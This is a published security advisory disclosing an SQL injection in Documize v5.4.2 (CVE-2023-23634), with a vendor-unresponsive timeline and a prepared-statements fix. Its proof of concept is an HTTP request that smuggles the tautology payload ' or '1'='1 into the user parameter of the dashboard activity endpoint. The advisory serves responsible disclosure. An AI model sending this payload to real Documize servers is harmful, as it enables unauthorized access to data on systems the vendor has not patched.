usd-2022-0066 | Documize v5.4.2 (221021105923) - SQL Injection

Advisory ID: usd-2022-0066
Product: Documize
Affected Version: v5.4.2 (221021105923)
Vulnerability Type: SQL Injection (CWE-89)
Security Risk: Critical
Vendor URL: https://www.documize.com
Vendor Status: Not fixed
CVE number: CVE-2023-23634

Description

The user parameter of the /api/dashboard/activity allows SQL-Injection.

Proof of Concept

The following request was used to inject data into the SQL query using the user parameter.

GET /api/dashboard/activity?days=1&user=invalid'%20or%20'1'%3d'1&activity=0 HTTP/1.1
Host: localhost:5001
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
authorization: ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.99 Safari/537.36
[...]

Fix

It is recommended to use prepared statements.

References

Timeline

  • 2022-12-16: First contact request via mail
  • 2023-01-09: Second contact request via mail
  • 2023-01-16: Try to contact vendor again
  • 2023-02-02: Try to contact vendor again
  • 2023-12-22: Publish advisory

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.